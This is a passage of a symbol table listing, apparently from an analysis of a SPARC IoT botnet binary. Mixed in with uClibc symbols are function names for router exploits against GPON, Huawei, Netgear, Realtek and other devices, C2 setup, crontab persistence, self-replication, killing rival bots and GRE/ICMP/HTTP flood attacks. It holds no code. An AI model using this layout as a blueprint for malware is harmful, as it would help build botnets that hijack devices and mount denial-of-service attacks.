              __stdio_seek.symtab0x2374052FUNC<unknown>HIDDEN2
              __stdio_trans2r_o.symtab0x21728152FUNC<unknown>HIDDEN2
              __stdio_trans2w_o.symtab0x217c0252FUNC<unknown>HIDDEN2
              __stdio_wcommit.symtab0x1a82c56FUNC<unknown>HIDDEN2
              __stdout.symtab0x380d84OBJECT<unknown>DEFAULT9
              __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __syscall_fcntl64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __syscall_rt_sigaction.symtab0x233a080FUNC<unknown>HIDDEN2
              __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __uClibc_fini.symtab0x20698132FUNC<unknown>DEFAULT2
              __uClibc_init.symtab0x20770104FUNC<unknown>DEFAULT2
              __uClibc_main.symtab0x207d8620FUNC<unknown>DEFAULT2
              __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __ubp_memchr.symtab0x223fc280FUNC<unknown>DEFAULT2
              __uclibc_progname.symtab0x383e44OBJECT<unknown>HIDDEN9
              __vfork.symtab0x20a4452FUNC<unknown>HIDDEN2
              __xpg_strerror_r.symtab0x1e730284FUNC<unknown>DEFAULT2
              __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __xstat64_conv.symtab0x21234140FUNC<unknown>HIDDEN2
              __xstat_conv.symtab0x212c0156FUNC<unknown>HIDDEN2
              _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _charpad.symtab0x1a8f860FUNC<unknown>DEFAULT2
              _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _dl_aux_init.symtab0x2334828FUNC<unknown>DEFAULT2
              _dl_phdr.symtab0x3aa804OBJECT<unknown>DEFAULT10
              _dl_phnum.symtab0x3aa844OBJECT<unknown>DEFAULT10
              _edata.symtab0x384240NOTYPE<unknown>DEFAULTSHN_ABS
              _end.symtab0x3aa880NOTYPE<unknown>DEFAULTSHN_ABS
              _errno.symtab0x3a6e44OBJECT<unknown>DEFAULT10
              _exit.symtab0x1981864FUNC<unknown>DEFAULT2
              _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _fini.symtab0x246048FUNC<unknown>DEFAULT3
              _fixed_buffers.symtab0x384b88192OBJECT<unknown>DEFAULT10
              _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _fp_out_narrow.symtab0x1a934128FUNC<unknown>DEFAULT2
              _fpmaxtostr.symtab0x21ac01908FUNC<unknown>HIDDEN2
              _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _h_errno.symtab0x3a6e84OBJECT<unknown>DEFAULT10
              _init.symtab0x100948FUNC<unknown>DEFAULT1
              _load_inttype.symtab0x218bc144FUNC<unknown>HIDDEN2
              _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _ppfs_init.symtab0x1b030164FUNC<unknown>HIDDEN2
              _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _ppfs_parsespec.symtab0x1b3381352FUNC<unknown>HIDDEN2
              _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _ppfs_prepargs.symtab0x1b0d460FUNC<unknown>HIDDEN2
              _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _ppfs_setargs.symtab0x1b110480FUNC<unknown>HIDDEN2
              _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _promoted_size.symtab0x1b2f072FUNC<unknown>DEFAULT2
              _pthread_cleanup_pop_restore.symtab0x207248FUNC<unknown>DEFAULT2
              _pthread_cleanup_push_defer.symtab0x207248FUNC<unknown>DEFAULT2
              _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _sigintr.symtab0x3a9c4128OBJECT<unknown>HIDDEN10
              _start.symtab0x101a456FUNC<unknown>DEFAULT2
              _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _stdio_fopen.symtab0x1a424732FUNC<unknown>HIDDEN2
              _stdio_init.symtab0x1a70096FUNC<unknown>HIDDEN2
              _stdio_openlist.symtab0x380dc4OBJECT<unknown>DEFAULT9
              _stdio_openlist_add_lock.symtab0x380e024OBJECT<unknown>DEFAULT9
              _stdio_openlist_dec_use.symtab0x1b9ac276FUNC<unknown>DEFAULT2
              _stdio_openlist_del_count.symtab0x384b44OBJECT<unknown>DEFAULT10
              _stdio_openlist_del_lock.symtab0x380f824OBJECT<unknown>DEFAULT9
              _stdio_openlist_use_count.symtab0x384b04OBJECT<unknown>DEFAULT10
              _stdio_streams.symtab0x38114240OBJECT<unknown>DEFAULT9
              _stdio_term.symtab0x1a77c176FUNC<unknown>HIDDEN2
              _stdio_user_locking.symtab0x381104OBJECT<unknown>DEFAULT9
              _stdlib_strto_l.symtab0x201e0428FUNC<unknown>HIDDEN2
              _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _store_inttype.symtab0x2194c60FUNC<unknown>HIDDEN2
              _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _string_syserrmsgs.symtab0x26b182934OBJECT<unknown>HIDDEN4
              _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _uintmaxtostr.symtab0x21988312FUNC<unknown>HIDDEN2
              _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _vfprintf_internal.symtab0x1a9b41660FUNC<unknown>HIDDEN2
              _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              abort.symtab0x2320c316FUNC<unknown>DEFAULT2
              abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              access.symtab0x1985872FUNC<unknown>DEFAULT2
              access.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              add_to_crontab.symtab0x102e4200FUNC<unknown>DEFAULT2
              addthis.symtab0x10804152FUNC<unknown>DEFAULT2
              atoi.symtab0x201b424FUNC<unknown>DEFAULT2
              atol.symtab0x201b424FUNC<unknown>DEFAULT2
              atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              bcopy.symtab0x1bfc412FUNC<unknown>DEFAULT2
              been_there_done_that.symtab0x3a7084OBJECT<unknown>DEFAULT10
              been_there_done_that.2818.symtab0x3a6e04OBJECT<unknown>DEFAULT10
              bind.symtab0x1f52c36FUNC<unknown>DEFAULT2
              bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              brk.symtab0x2336460FUNC<unknown>DEFAULT2
              brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              bsd_signal.symtab0x1f6f8188FUNC<unknown>DEFAULT2
              buf.2628.symtab0x3a4c016OBJECT<unknown>DEFAULT10
              buf.4861.symtab0x3a4d0460OBJECT<unknown>DEFAULT10
              bzero.symtab0x1d62852FUNC<unknown>DEFAULT2
              call___do_global_ctors_aux.symtab0x245f80FUNC<unknown>DEFAULT2
              call___do_global_dtors_aux.symtab0x1012c0FUNC<unknown>DEFAULT2
              call_frame_dummy.symtab0x101980FUNC<unknown>DEFAULT2
              calloc.symtab0x1f974112FUNC<unknown>DEFAULT2
              calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              chdir.symtab0x198a068FUNC<unknown>DEFAULT2
              chdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              check_crontab_entry.symtab0x101dc264FUNC<unknown>DEFAULT2
              child_count.symtab0x384784OBJECT<unknown>DEFAULT10
              child_pids.symtab0x3a884320OBJECT<unknown>DEFAULT10
              chmod.symtab0x198e476FUNC<unknown>DEFAULT2
              chmod.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              close.symtab0x1993068FUNC<unknown>DEFAULT2
              close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              closedir.symtab0x19bd8136FUNC<unknown>DEFAULT2
              closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              completed.2248.symtab0x384281OBJECT<unknown>DEFAULT10
              connect.symtab0x1f55076FUNC<unknown>DEFAULT2
              connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              creat.symtab0x210e424FUNC<unknown>DEFAULT2
              createChildrenreplic.symtab0x12848280FUNC<unknown>DEFAULT2
              crontab.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              crontabinit.symtab0x103ac424FUNC<unknown>DEFAULT2
              crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              csum.symtab0x133d8240FUNC<unknown>DEFAULT2
              daemonize.symtab0x12434224FUNC<unknown>DEFAULT2
              data_start.symtab0x380200NOTYPE<unknown>DEFAULT9
              decodea.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              destroythis.symtab0x1089c112FUNC<unknown>DEFAULT2
              difftime.symtab0x19e1840FUNC<unknown>DEFAULT2
              difftime.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              dup2.symtab0x20bac72FUNC<unknown>DEFAULT2
              dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              encrypt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              environ.symtab0x3a6d04OBJECT<unknown>DEFAULT10
              errno.symtab0x3a6e44OBJECT<unknown>DEFAULT10
              errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              estridx.symtab0x26a88126OBJECT<unknown>DEFAULT4
              execl.symtab0x2040c152FUNC<unknown>DEFAULT2
              execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              execve.symtab0x20bf476FUNC<unknown>DEFAULT2
              execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              exit.symtab0x2038c128FUNC<unknown>DEFAULT2
              exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              exp10_table.symtab0x27a5872OBJECT<unknown>DEFAULT4
              exploit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              exploit_pid.symtab0x3a8704OBJECT<unknown>DEFAULT10
              exploit_socket_crossweb.symtab0x1170c260FUNC<unknown>DEFAULT2
              exploit_socket_dlink.symtab0x11918264FUNC<unknown>DEFAULT2
              exploit_socket_gpon80.symtab0x10e78260FUNC<unknown>DEFAULT2
              exploit_socket_gpon8080.symtab0x10d68272FUNC<unknown>DEFAULT2
              exploit_socket_hnap.symtab0x11604264FUNC<unknown>DEFAULT2
              exploit_socket_huawei.symtab0x112e8268FUNC<unknown>DEFAULT2
              exploit_socket_jaws.symtab0x11810264FUNC<unknown>DEFAULT2
              exploit_socket_netgear80.symtab0x111e4260FUNC<unknown>DEFAULT2
              exploit_socket_netgear8080.symtab0x110dc264FUNC<unknown>DEFAULT2
              exploit_socket_r7064.symtab0x11a20264FUNC<unknown>DEFAULT2
              exploit_socket_realtek.symtab0x10f7c352FUNC<unknown>DEFAULT2
              exploit_socket_tplink2.symtab0x11c30268FUNC<unknown>DEFAULT2
              exploit_socket_tr064_5555.symtab0x114fc264FUNC<unknown>DEFAULT2
              exploit_socket_tr064_7574.symtab0x113f4264FUNC<unknown>DEFAULT2
              exploit_socket_vacron.symtab0x11b28264FUNC<unknown>DEFAULT2
              fclose.symtab0x19e40324FUNC<unknown>DEFAULT2
              fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fcntl.symtab0x20ac0136FUNC<unknown>DEFAULT2
              fcntl64.symtab0x20b48100FUNC<unknown>DEFAULT2
              fdopen.symtab0x2148852FUNC<unknown>DEFAULT2
              fdopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fflush_unlocked.symtab0x1bac0420FUNC<unknown>DEFAULT2
              fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fgetc_unlocked.symtab0x22234328FUNC<unknown>DEFAULT2
              fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fgets.symtab0x1b880100FUNC<unknown>DEFAULT2
              fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fgets_unlocked.symtab0x1bc64192FUNC<unknown>DEFAULT2
              fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fmt.symtab0x27a4020OBJECT<unknown>DEFAULT4
              fopen.symtab0x19f8424FUNC<unknown>DEFAULT2
              fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fork.symtab0x1978c52FUNC<unknown>DEFAULT2
              fprintf.symtab0x19fec48FUNC<unknown>DEFAULT2
              fprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fputs.symtab0x1b8e496FUNC<unknown>DEFAULT2
              fputs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fputs_unlocked.symtab0x1bd2460FUNC<unknown>DEFAULT2
              fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              frame_dummy.symtab0x101380FUNC<unknown>DEFAULT2
              fread.symtab0x1b944104FUNC<unknown>DEFAULT2
              fread.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fread_unlocked.symtab0x1bd60376FUNC<unknown>DEFAULT2
              fread_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              free.symtab0x1f9e4232FUNC<unknown>DEFAULT2
              free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fseek.symtab0x234d836FUNC<unknown>DEFAULT2
              fseeko.symtab0x234d836FUNC<unknown>DEFAULT2
              fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fseeko64.symtab0x234fc272FUNC<unknown>DEFAULT2
              fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fstat.symtab0x20c40104FUNC<unknown>DEFAULT2
              fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fuckothernets.symtab0x11e20164FUNC<unknown>DEFAULT2
              fwrite_unlocked.symtab0x1bed8176FUNC<unknown>DEFAULT2
              fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              generateRandomIP.symtab0x1907c316FUNC<unknown>DEFAULT2
              generate_random_string.symtab0x122dc344FUNC<unknown>DEFAULT2
              get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              get_http_content.symtab0x12514820FUNC<unknown>DEFAULT2
              get_ips_in_that_block.symtab0x188dc420FUNC<unknown>DEFAULT2
              get_local_ip.symtab0x134c8464FUNC<unknown>DEFAULT2
              get_pid.symtab0x11f90844FUNC<unknown>DEFAULT2
              getc_unlocked.symtab0x22234328FUNC<unknown>DEFAULT2
              getdents.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getegid.symtab0x20e5064FUNC<unknown>DEFAULT2
              getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              geteuid.symtab0x20e9064FUNC<unknown>DEFAULT2
              geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getgid.symtab0x20ed064FUNC<unknown>DEFAULT2
              getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              gethostbyname.symtab0x1f1f060FUNC<unknown>DEFAULT2
              gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              gethostbyname_r.symtab0x1f22c768FUNC<unknown>DEFAULT2
              gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getmethis.symtab0x1079c104FUNC<unknown>DEFAULT2
              getpid.symtab0x1997464FUNC<unknown>DEFAULT2
              getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getsockname.symtab0x1f59c76FUNC<unknown>DEFAULT2
              getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              gettimeofday.symtab0x199b472FUNC<unknown>DEFAULT2
              gettimeofday.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getuid.symtab0x20f1064FUNC<unknown>DEFAULT2
              getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              global.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              gre.symtab0x1461c1032FUNC<unknown>DEFAULT2
              h.4860.symtab0x3a69c20OBJECT<unknown>DEFAULT10
              h_errno.symtab0x3a6e84OBJECT<unknown>DEFAULT10
              handshake.symtab0x13e0c1200FUNC<unknown>DEFAULT2
              heap_alloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              heap_free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              htonl.symtab0x1e9088FUNC<unknown>DEFAULT2
              htons.symtab0x1e91012FUNC<unknown>DEFAULT2
              http.symtab0x142bc864FUNC<unknown>DEFAULT2
              i.symtab0x384744OBJECT<unknown>DEFAULT10
              icmp.symtab0x152341032FUNC<unknown>DEFAULT2
              igmp.symtab0x1563c1032FUNC<unknown>DEFAULT2
              ignore_signals.symtab0x11f3096FUNC<unknown>DEFAULT2
              increment_ip.symtab0x1888884FUNC<unknown>DEFAULT2
              index.symtab0x1dcc4524FUNC<unknown>DEFAULT2
              inet_addr.symtab0x1f1c840FUNC<unknown>DEFAULT2
              inet_aton.symtab0x1f058220FUNC<unknown>DEFAULT2
              inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              inet_ntoa.symtab0x1f1a436FUNC<unknown>DEFAULT2
              inet_ntoa.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              inet_ntoa_r.symtab0x1f134112FUNC<unknown>DEFAULT2
              inet_ntop.symtab0x1edac684FUNC<unknown>DEFAULT2
              inet_ntop4.symtab0x1ec08420FUNC<unknown>DEFAULT2
              inet_pton.symtab0x1e9e8544FUNC<unknown>DEFAULT2
              inet_pton4.symtab0x1e91c204FUNC<unknown>DEFAULT2
              initC2.symtab0x129f42032FUNC<unknown>DEFAULT2
              initReplic.symtab0x193b4984FUNC<unknown>DEFAULT2
              initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              initial_fa.symtab0x38210264OBJECT<unknown>DEFAULT9
              initstate.symtab0x1fd8096FUNC<unknown>DEFAULT2
              initstate_r.symtab0x200d0228FUNC<unknown>DEFAULT2
              ioctl.symtab0x20f50100FUNC<unknown>DEFAULT2
              ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              ip.3363.symtab0x3848016OBJECT<unknown>DEFAULT10
              ipState.symtab0x3844840OBJECT<unknown>DEFAULT10
              isPortOpen.symtab0x191b8508FUNC<unknown>DEFAULT2
              isatty.symtab0x1e86432FUNC<unknown>DEFAULT2
              isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              isbl.symtab0x18a801532FUNC<unknown>DEFAULT2
              kill.symtab0x199fc72FUNC<unknown>DEFAULT2
              kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              killChildren.symtab0x12960148FUNC<unknown>DEFAULT2
              lengthd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              lengthq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/string/sparc/memchr.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/string/sparc/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/string/sparc/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/string/sparc/strcat.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/string/sparc/strchr.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/string/sparc/strcmp.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/string/sparc/strcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/string/sparc/strlen.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/sysdeps/linux/sparc/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/sysdeps/linux/sparc/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/sysdeps/linux/sparc/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/sysdeps/linux/sparc/fork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/sysdeps/linux/sparc/rem.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/sysdeps/linux/sparc/umul.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/sysdeps/linux/sparc/urem.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc/sysdeps/linux/sparc/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              lock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              lockthis.symtab0x1074092FUNC<unknown>DEFAULT2
              lseek64.symtab0x20fb4112FUNC<unknown>DEFAULT2
              main.symtab0x131e4500FUNC<unknown>DEFAULT2
              main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              malloc.symtab0x1f834320FUNC<unknown>DEFAULT2
              malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              max.symtab0x384704OBJECT<unknown>DEFAULT10
              memchr.symtab0x223fc280FUNC<unknown>DEFAULT2
              memcpy.symtab0x1c5b44212FUNC<unknown>DEFAULT2
              memmove.symtab0x1bfd01508FUNC<unknown>DEFAULT2
              mempcpy.symtab0x2251432FUNC<unknown>DEFAULT2
              mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              memrchr.symtab0x22534272FUNC<unknown>DEFAULT2
              memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              memset.symtab0x1d65c416FUNC<unknown>DEFAULT2
              method.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              mylock.symtab0x3849024OBJECT<unknown>DEFAULT10
              mylock.symtab0x3831824OBJECT<unknown>DEFAULT9
              mylock.symtab0x3a6ec24OBJECT<unknown>DEFAULT10
              mylock.symtab0x3840c24OBJECT<unknown>DEFAULT9
              nanosleep.symtab0x2102472FUNC<unknown>DEFAULT2
              nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              next_start.1092.symtab0x3a4b84OBJECT<unknown>DEFAULT10
              ntohl.symtab0x1e8f48FUNC<unknown>DEFAULT2
              ntohl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              ntohs.symtab0x1e8fc12FUNC<unknown>DEFAULT2
              ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              object.2329.symtab0x3842c24OBJECT<unknown>DEFAULT10
              open.symtab0x2106c120FUNC<unknown>DEFAULT2
              open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              opendir.symtab0x19c60260FUNC<unknown>DEFAULT2
              opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              ospf.symtab0x14e2c1032FUNC<unknown>DEFAULT2
              p.2246.symtab0x3801c0OBJECT<unknown>DEFAULT9
              pclose.symtab0x1a11c252FUNC<unknown>DEFAULT2
              perror.symtab0x19f9c80FUNC<unknown>DEFAULT2
              perror.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              pipe.symtab0x210fc68FUNC<unknown>DEFAULT2
              pipe.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              poll.symtab0x233f076FUNC<unknown>DEFAULT2
              poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              popen.symtab0x1a218524FUNC<unknown>DEFAULT2
              popen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              popen_list.symtab0x384a84OBJECT<unknown>DEFAULT10
              prefix.4072.symtab0x269e012OBJECT<unknown>DEFAULT4
              protorand.symtab0x15a441140FUNC<unknown>DEFAULT2
              qual_chars.4078.symtab0x269f820OBJECT<unknown>DEFAULT4
              raise.symtab0x2439824FUNC<unknown>DEFAULT2
              raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              rand.symtab0x1fcc016FUNC<unknown>DEFAULT2
              rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              random.symtab0x1fcd080FUNC<unknown>DEFAULT2
              random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              random_poly_info.symtab0x276c440OBJECT<unknown>DEFAULT4
              random_r.symtab0x1ff50156FUNC<unknown>DEFAULT2
              random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              randtbl.symtab0x3834c128OBJECT<unknown>DEFAULT9
              rawmemchr.symtab0x23a90204FUNC<unknown>DEFAULT2
              rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              rdp.symtab0x14a241032FUNC<unknown>DEFAULT2
              read.symtab0x2343c76FUNC<unknown>DEFAULT2
              read.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              readdir.symtab0x19d64168FUNC<unknown>DEFAULT2
              readdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              recv.symtab0x1f5e832FUNC<unknown>DEFAULT2
              recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              removeReadPermission.symtab0x11d3c228FUNC<unknown>DEFAULT2
              rename.symtab0x19a4472FUNC<unknown>DEFAULT2
              rename.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              replic.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              rindex.symtab0x1ded0192FUNC<unknown>DEFAULT2
              sbrk.symtab0x2114084FUNC<unknown>DEFAULT2
              sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              scanner10_pid.symtab0x3a84c4OBJECT<unknown>DEFAULT10
              scanner11_pid.symtab0x3a8504OBJECT<unknown>DEFAULT10
              scanner12_pid.symtab0x3a8544OBJECT<unknown>DEFAULT10
              scanner13_pid.symtab0x3a8644OBJECT<unknown>DEFAULT10
              scanner14_pid.symtab0x3a85c4OBJECT<unknown>DEFAULT10
              scanner2_pid.symtab0x3a8744OBJECT<unknown>DEFAULT10
              scanner3_pid.symtab0x3a8484OBJECT<unknown>DEFAULT10
              scanner4_pid.symtab0x3a8584OBJECT<unknown>DEFAULT10
              scanner5_pid.symtab0x3a87c4OBJECT<unknown>DEFAULT10
              scanner6_pid.symtab0x3a86c4OBJECT<unknown>DEFAULT10
              scanner7_pid.symtab0x3a8604OBJECT<unknown>DEFAULT10
              scanner8_pid.symtab0x3a8784OBJECT<unknown>DEFAULT10
              scanner9_pid.symtab0x3a8684OBJECT<unknown>DEFAULT10
              send.symtab0x1f60832FUNC<unknown>DEFAULT2
              send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sendto.symtab0x1f62888FUNC<unknown>DEFAULT2
              sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              setsid.symtab0x19a8c64FUNC<unknown>DEFAULT2
              setsid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              setsockopt.symtab0x1f68044FUNC<unknown>DEFAULT2
              setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              setstate.symtab0x1fd2096FUNC<unknown>DEFAULT2
              setstate_r.symtab0x1fe2c292FUNC<unknown>DEFAULT2
              sigaction.symtab0x2316c160FUNC<unknown>DEFAULT2
              sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              signal.symtab0x1f6f8188FUNC<unknown>DEFAULT2
              signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sigprocmask.symtab0x21194140FUNC<unknown>DEFAULT2
              sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sleep.symtab0x204a4428FUNC<unknown>DEFAULT2
              sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              snprintf.symtab0x1a01c48FUNC<unknown>DEFAULT2
              snprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              socket.symtab0x1f6ac76FUNC<unknown>DEFAULT2
              socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              socket_connect_tcp.symtab0x10bf0348FUNC<unknown>DEFAULT2
              socket_connect_udp.symtab0x10d4c28FUNC<unknown>DEFAULT2
              spec_and_mask.4077.symtab0x26a0c16OBJECT<unknown>DEFAULT4
              spec_base.4071.symtab0x269f07OBJECT<unknown>DEFAULT4
              spec_chars.4074.symtab0x26a4021OBJECT<unknown>DEFAULT4
              spec_flags.4073.symtab0x26a588OBJECT<unknown>DEFAULT4
              spec_or_mask.4076.symtab0x26a1c16OBJECT<unknown>DEFAULT4
              spec_ranges.4075.symtab0x26a309OBJECT<unknown>DEFAULT4
              sprintf.symtab0x1a04c52FUNC<unknown>DEFAULT2
